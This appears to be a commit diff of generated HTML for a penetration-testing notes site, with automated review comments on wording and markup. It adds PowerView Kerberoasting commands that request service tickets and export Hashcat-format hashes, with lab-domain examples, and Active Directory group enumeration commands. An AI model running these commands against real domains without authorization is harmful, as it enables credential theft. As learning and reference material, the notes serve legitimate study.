Deployed d9210a1 with MkDocs version: 1.6.1
Unknown committed Jan 2, 2025
1 parent 97a14d4 commit 0da0137
Showing 12 changed files with 18,558 additions and 1,131 deletions.
28 changes: 19 additions & 9 deletions active-directory-from-windows-privilege-escalation/index.html
Expand Up @@ -17623,15 +17623,25 @@ <h3 id="powerview">PowerView</h3>
</span><span id="__span-9-9"><a id="__codelineno-9-9" name="__codelineno-9-9"></a><span class="nb">Get-NetUser</span> <span class="n">-SPN</span>
</span></code></pre></div></td></tr></table></div>
<p><strong>2.</strong> Generate a TGS ticker for a specific user:</p>
<div class="language-powershell highlight"><table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre><span></span><span class="normal"><a href="#__codelineno-10-1">1</a></span>
<span class="normal"><a href="#__codelineno-10-2">2</a></span>
<span class="normal"><a href="#__codelineno-10-3">3</a></span>
<span class="normal"><a href="#__codelineno-10-4">4</a></span>
<span class="normal"><a href="#__codelineno-10-5">5</a></span></pre></div></td><td class="code"><div><pre><span></span><code><span id="__span-10-1"><a id="__codelineno-10-1" name="__codelineno-10-1"></a><span class="c"># Option 1</span>
<div class="language-powershell highlight"><table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre><span></span><span class="normal"><a href="#__codelineno-10-1"> 1</a></span>
<span class="normal"><a href="#__codelineno-10-2"> 2</a></span>
<span class="normal"><a href="#__codelineno-10-3"> 3</a></span>
<span class="normal"><a href="#__codelineno-10-4"> 4</a></span>
<span class="normal"><a href="#__codelineno-10-5"> 5</a></span>
<span class="normal"><a href="#__codelineno-10-6"> 6</a></span>
<span class="normal"><a href="#__codelineno-10-7"> 7</a></span>
<span class="normal"><a href="#__codelineno-10-8"> 8</a></span>
<span class="normal"><a href="#__codelineno-10-9"> 9</a></span>
<span class="normal"><a href="#__codelineno-10-10">10</a></span></pre></div></td><td class="code"><div><pre><span></span><code><span id="__span-10-1"><a id="__codelineno-10-1" name="__codelineno-10-1"></a><span class="c"># Option 1</span>
</span><span id="__span-10-2"><a id="__codelineno-10-2" name="__codelineno-10-2"></a><span class="nb">Get-DomainUser</span> <span class="n">-Identity</span> <span class="nv">$samAccountName</span> <span class="p">|</span> <span class="nb">Get-DomainSPNTicket</span> <span class="n">-Format</span> <span class="n">Hashcat</span>
</span><span id="__span-10-3"><a id="__codelineno-10-3" name="__codelineno-10-3"></a>
</span><span id="__span-10-4"><a id="__codelineno-10-4" name="__codelineno-10-4"></a><span class="c"># Option 2</span>
</span><span id="__span-10-5"><a id="__codelineno-10-5" name="__codelineno-10-5"></a><span class="nb">Get-DomainSPNTicket</span> <span class="n">-SPN</span> <span class="nv">$samAccountName</span> <span class="n">-OutputFormat</span> <span class="n">Hashcat</span> <span class="p">|</span> <span class="nb">select </span><span class="n">-ExpandProperty</span> <span class="n">Hash</span> <span class="p">&gt;</span> <span class="n">file</span><span class="p">.</span><span class="n">txt</span>
</span><span id="__span-10-3"><a id="__codelineno-10-3" name="__codelineno-10-3"></a><span class="c"># Example: </span>
</span><span id="__span-10-4"><a id="__codelineno-10-4" name="__codelineno-10-4"></a><span class="c"># Get-DomainUser -Identity MSSQLSvc/SQL01.inlanefreight.local:1433 | Get-DomainSPNTicket -Format Hashcat</span>
</span><span id="__span-10-5"><a id="__codelineno-10-5" name="__codelineno-10-5"></a>
</span><span id="__span-10-6"><a id="__codelineno-10-6" name="__codelineno-10-6"></a>
</span><span id="__span-10-7"><a id="__codelineno-10-7" name="__codelineno-10-7"></a><span class="c"># Option 2</span>
</span><span id="__span-10-8"><a id="__codelineno-10-8" name="__codelineno-10-8"></a><span class="nb">Get-DomainSPNTicket</span> <span class="n">-SPN</span> <span class="nv">$samAccountName</span> <span class="n">-OutputFormat</span> <span class="n">Hashcat</span> <span class="p">|</span> <span class="nb">select </span><span class="n">-ExpandProperty</span> <span class="n">Hash</span> <span class="p">&gt;</span> <span class="n">file</span><span class="p">.</span><span class="n">txt</span>
</span><span id="__span-10-9"><a id="__codelineno-10-9" name="__codelineno-10-9"></a><span class="c"># Example: </span>
</span><span id="__span-10-10"><a id="__codelineno-10-10" name="__codelineno-10-10"></a><span class="c"># Get-DomainSPNTicket -SPN MSSQLSvc/SQL01.inlanefreight.local:1433 -OutputFormat Hashcat | select -ExpandProperty Hash &gt; file.txt</span>
</span></code></pre></div></td></tr></table></div>
<p><strong>3.</strong> Or obtain all SPN TGS tickets and export them to a CSV</p>
<div class="language-text highlight"><table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre><span></span><span class="normal"><a href="#__codelineno-11-1">1</a></span></pre></div></td><td class="code"><div><pre><span></span><code><span id="__span-11-1"><a id="__codelineno-11-1" name="__codelineno-11-1"></a>Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\FileName.csv -NoTypeInformation
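Review bot: In the new Option 1 example (the added comment at code line 4), the value given to `Get-DomainUser -Identity` is an SPN, `MSSQLSvc/SQL01.inlanefreight.local:1433`, while the command it illustrates names that argument `$samAccountName`; Option 2 has the reverse mismatch, passing `$samAccountName` to `-SPN`. Use an account name in the Option 1 example and rename the Option 2 placeholder to something like `$spn`, so the reader does not have to guess which identifier each parameter takes. The two options also spell the format switch differently (`-Format` and `-OutputFormat`); pick one spelling for both. While this block is being touched, the step text above it says "TGS ticker" and should say "ticket".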
Expand Down Expand Up @@ -18900,7 +18910,7 @@ <h2 id="mitigations_1">Mitigations</h2>

<!-- This section adds support for localized revision dates -->

<small>Last update: <span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-timeago"><span class="timeago" datetime="2025-01-01T20:37:04+00:00" locale="en"></span></span><span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-iso_date">2025-01-01</span></small></br>
<small>Last update: <span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-timeago"><span class="timeago" datetime="2025-01-02T19:07:53+00:00" locale="en"></span></span><span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-iso_date">2025-01-02</span></small></br>


<small>Created: December 27, 2024 22:00:41</small>
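Review bot: The "Last update" line ends with `</br>`, which is not a valid tag, and the change carries it over untouched; it should be `<br>`. The only difference in this hunk is the generated timestamp (2025-01-01 to 2025-01-02), and the commit message says this is MkDocs build output, so the fix belongs in the template that emits this footer rather than in this file. The same line appears in activedirectory-powershell-module/index.html.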
24 changes: 15 additions & 9 deletions activedirectory-powershell-module/index.html
Expand Up @@ -17247,21 +17247,27 @@ <h3 id="get-adcomputer">Get-ADComputer</h3>
</span><span id="__span-6-2"><a id="__codelineno-6-2" name="__codelineno-6-2"></a><span class="nb">Get-ADComputer</span> <span class="n">-Filter</span> <span class="s2">&quot;DNSHostName -like &#39;SQL*&#39;&quot;</span>
</span></code></pre></div></td></tr></table></div>
<h3 id="get-adgroup">Get-ADGroup</h3>
<div class="language-powershell highlight"><table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre><span></span><span class="normal"><a href="#__codelineno-7-1">1</a></span>
<span class="normal"><a href="#__codelineno-7-2">2</a></span>
<span class="normal"><a href="#__codelineno-7-3">3</a></span>
<span class="normal"><a href="#__codelineno-7-4">4</a></span>
<span class="normal"><a href="#__codelineno-7-5">5</a></span>
<span class="normal"><a href="#__codelineno-7-6">6</a></span>
<span class="normal"><a href="#__codelineno-7-7">7</a></span>
<span class="normal"><a href="#__codelineno-7-8">8</a></span></pre></div></td><td class="code"><div><pre><span></span><code><span id="__span-7-1"><a id="__codelineno-7-1" name="__codelineno-7-1"></a><span class="c"># Group enumeration</span>
<div class="language-powershell highlight"><table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre><span></span><span class="normal"><a href="#__codelineno-7-1"> 1</a></span>
<span class="normal"><a href="#__codelineno-7-2"> 2</a></span>
<span class="normal"><a href="#__codelineno-7-3"> 3</a></span>
<span class="normal"><a href="#__codelineno-7-4"> 4</a></span>
<span class="normal"><a href="#__codelineno-7-5"> 5</a></span>
<span class="normal"><a href="#__codelineno-7-6"> 6</a></span>
<span class="normal"><a href="#__codelineno-7-7"> 7</a></span>
<span class="normal"><a href="#__codelineno-7-8"> 8</a></span>
<span class="normal"><a href="#__codelineno-7-9"> 9</a></span>
<span class="normal"><a href="#__codelineno-7-10">10</a></span>
<span class="normal"><a href="#__codelineno-7-11">11</a></span></pre></div></td><td class="code"><div><pre><span></span><code><span id="__span-7-1"><a id="__codelineno-7-1" name="__codelineno-7-1"></a><span class="c"># Group enumeration</span>
</span><span id="__span-7-2"><a id="__codelineno-7-2" name="__codelineno-7-2"></a><span class="nb">Get-ADGroup</span> <span class="n">-Filter</span> <span class="p">*</span> <span class="p">|</span> <span class="nb">select </span><span class="n">name</span>
</span><span id="__span-7-3"><a id="__codelineno-7-3" name="__codelineno-7-3"></a>
</span><span id="__span-7-4"><a id="__codelineno-7-4" name="__codelineno-7-4"></a><span class="c"># Get detailed information about a group</span>
</span><span id="__span-7-5"><a id="__codelineno-7-5" name="__codelineno-7-5"></a><span class="nb">Get-ADGroup</span> <span class="n">-Identity</span> <span class="s2">&quot;Backup Operators&quot;</span>
</span><span id="__span-7-6"><a id="__codelineno-7-6" name="__codelineno-7-6"></a>
</span><span id="__span-7-7"><a id="__codelineno-7-7" name="__codelineno-7-7"></a><span class="c"># Search for administrative groups by filtering on the `adminCount` attribute. If set to `1`, it&#39;s protected by AdminSDHolder and known as protected groups. `AdminSDHolder` is owned by the Domain Admins group. It has the privileges to change the permissions of objects in Active Directory. </span>
</span><span id="__span-7-8"><a id="__codelineno-7-8" name="__codelineno-7-8"></a><span class="nb">Get-ADGroup</span> <span class="n">-Filter</span> <span class="s2">&quot;adminCount -eq 1&quot;</span> <span class="p">|</span> <span class="nb">select </span><span class="n">Name</span>
</span><span id="__span-7-9"><a id="__codelineno-7-9" name="__codelineno-7-9"></a>
</span><span id="__span-7-10"><a id="__codelineno-7-10" name="__codelineno-7-10"></a><span class="c"># Viewing the Protected Users Group with Get-ADGroup</span>
</span><span id="__span-7-11"><a id="__codelineno-7-11" name="__codelineno-7-11"></a><span class="nb">Get-ADGroup</span> <span class="n">-Identity</span> <span class="s2">&quot;Protected Users&quot;</span> <span class="n">-Properties</span> <span class="n">Name</span><span class="p">,</span><span class="n">Description</span><span class="p">,</span><span class="n">Members</span>
</span></code></pre></div></td></tr></table></div>
<h3 id="get-adgroupmember">Get-ADGroupMember</h3>
<div class="language-powershell highlight"><table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre><span></span><span class="normal"><a href="#__codelineno-8-1">1</a></span>
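Review bot: The added comment at code line 10, "Viewing the Protected Users Group with Get-ADGroup", only restates the command under it, whereas the adminCount comment at line 7 explains what the attribute means. Say in one line what the reader should look for in the output (for instance which accounts appear under Members), and phrase it in the imperative to match "Get detailed information about a group" above. The line 7 comment is also a whole paragraph on a single comment line, with Markdown backticks that do not render inside a code block; it would read better as prose above the block.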
Expand All @@ -17275,7 +17281,7 @@ <h3 id="get-adtrust">Get-ADTrust</h3>

<!-- This section adds support for localized revision dates -->

<small>Last update: <span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-timeago"><span class="timeago" datetime="2025-01-01T20:37:04+00:00" locale="en"></span></span><span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-iso_date">2025-01-01</span></small></br>
<small>Last update: <span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-timeago"><span class="timeago" datetime="2025-01-02T19:07:53+00:00" locale="en"></span></span><span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-iso_date">2025-01-02</span></small></br>


<small>Created: May 9, 2023 17:16:52</small>